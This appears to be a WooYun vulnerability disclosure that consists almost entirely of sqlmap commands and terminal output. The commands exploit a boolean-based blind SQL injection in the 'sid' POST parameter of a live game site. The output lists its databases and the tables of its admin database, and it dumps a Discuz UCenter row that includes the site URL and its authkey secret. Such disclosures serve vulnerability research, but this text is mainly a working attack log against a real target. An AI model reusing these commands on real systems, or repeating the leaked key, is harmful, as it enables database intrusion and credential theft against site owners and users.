WooYun.org

sqlmap -r /root/post.txt --dbs -p sid --technique B --threads 1 --tamper=between

root@BlueIce:~# sqlmap -r /root/post.txt --dbs -p sid --technique B --threads 1 --tamper=between
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 23:47:53
[23:47:53] [INFO] parsing HTTP request from '/root/post.txt'
[23:47:53] [INFO] loading tamper script 'between'
[23:47:58] [INFO] testing connection to the target URL
[23:47:59] [INFO] testing if the target URL is stable. This can take a couple of seconds
[23:48:01] [INFO] target URL is stable
[23:48:01] [WARNING] heuristic (basic) test shows that POST parameter 'sid' might not be injectable
[23:48:01] [INFO] testing for SQL injection on POST parameter 'sid'
[23:48:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:48:03] [INFO] POST parameter 'sid' is 'AND boolean-based blind - WHERE or HAVING clause' injectable 
[23:48:05] [INFO] checking if the injection point on POST parameter 'sid' is a false positive
POST parameter 'sid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection points with a total of 17 HTTP(s) requests:
---
Place: POST
Parameter: sid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: sid=7509 AND 9095=9095
---
[23:48:07] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[23:48:07] [INFO] testing MySQL
[23:48:07] [INFO] confirming MySQL
[23:48:07] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3
back-end DBMS: MySQL >= 5.0.0
[23:48:07] [INFO] fetching database names
[23:48:07] [INFO] fetching number of databases
[23:48:07] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[23:48:07] [INFO] retrieved: 4
[23:48:08] [INFO] retrieved: information_schema
[23:48:35] [INFO] retrieved: game_bbs
[23:48:46] [INFO] retrieved: tg_admin
[23:49:00] [INFO] retrieved: web_admin
available databases [4]:
[*] game_bbs
[*] information_schema
[*] tg_admin
[*] web_admin

Database: game_bbs
Table: pre_ucenter_applications
[1 entry]
+-------+---------+------------------+---------------+---------+---------+---------+------------------------------------------------------------------+----------+----------+----------+-----------+------------+-------------+--------------+
| appid | ip      | url              | name          | type    | extra   | charset | authkey                                                          | recvnote | synlogin | allowips | dbcharset | viewprourl | apifilename | tagtemplates |
+-------+---------+------------------+---------------+---------+---------+---------+------------------------------------------------------------------+----------+----------+----------+-----------+------------+-------------+--------------+
| 1     | <blank> | http://bbs.ha.cc | Discuz! Board | DISCUZX | <blank> | <blank> | u0b8wfw1Wfd2t09ey0b4k87fY4Q0d4sfq2iaI4Uck8M4WbdeScO9i0I0Ier0Q6zf | 1        | 1        | <blank>  | <blank>   | <blank>    | uc.php      | <blank>      |
+-------+---------+------------------+---------------+---------+---------+---------+------------------------------------------------------------------+----------+----------+----------+-----------+------------+-------------+--------------+

root@BlueIce:~# sqlmap -r /root/post.txt -D web_admin --tables  -p sid --technique B --threads 1 --tamper=between 
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 00:38:49
[00:38:49] [INFO] parsing HTTP request from '/root/post.txt'
[00:38:49] [INFO] loading tamper script 'between'
[00:38:49] [INFO] resuming back-end DBMS 'mysql' 
[00:38:54] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: sid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: sid=7509 AND 9095=9095
---
[00:38:54] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[00:38:54] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3
back-end DBMS: MySQL 5
[00:38:54] [INFO] fetching tables for database: 'web_admin'
[00:38:54] [INFO] fetching number of tables for database 'web_admin'
[00:38:54] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[00:38:54] [INFO] retrieved: 24
[00:38:56] [INFO] retrieved: yg_admins_resources
[00:39:21] [INFO] retrieved: yg_category
[00:39:33] [INFO] retrieved: yg_email_user
[00:39:47] [INFO] retrieved: yg_games
[00:39:55] [INFO] retrieved: yg_gameweb_info
[00:40:07] [INFO] retrieved: yg_guest_info
[00:40:20] [INFO] retrieved: yg_guest_logined_user_relation
[00:40:48] [INFO] retrieved: yg_guest_user_relation
[00:41:07] [INFO] retrieved: yg_lastest_togame
[00:41:27] [INFO] retrieved: yg_lb_cards
[00:41:38] [INFO] retrieved: yg_lb_cate
[00:41:43] [INFO] retrieved: yg_lb_info
[00:41:50] [INFO] retrieved: yg_news
[00:41:57] [INFO] retrieved: yg_orders_log
[00:42:11] [INFO] retrieved: yg_pay_log
[00:42:21] [INFO] retrieved: yg_pic
[00:42:26] [INFO] retrieved: yg_resources
[00:42:39] [INFO] retrieved: yg_role
[00:42:44] [INFO] retrieved: yg_role_resources
[00:42:59] [INFO] retrieved: yg_servers
[00:43:09] [INFO] retrieved: yg_system_admins
[00:43:26] [INFO] retrieved: yg_togame_log
[00:43:40] [INFO] retrieved: yg_user_info
[00:43:52] [INFO] retrieved: yg_user_map
Database: web_admin
[24 tables]
+--------------------------------+
| yg_admins_resources            |
| yg_category                    |
| yg_email_user                  |
| yg_games                       |
| yg_gameweb_info                |
| yg_guest_info                  |
| yg_guest_logined_user_relation |
| yg_guest_user_relation         |
| yg_lastest_togame              |
| yg_lb_cards                    |
| yg_lb_cate                     |
| yg_lb_info                     |
| yg_news                        |
| yg_orders_log                  |
| yg_pay_log                     |
| yg_pic                         |
| yg_resources                   |
| yg_role                        |
| yg_role_resources              |
| yg_servers                     |
| yg_system_admins               |
| yg_togame_log                  |
| yg_user_info                   |
| yg_user_map                    |
+--------------------------------+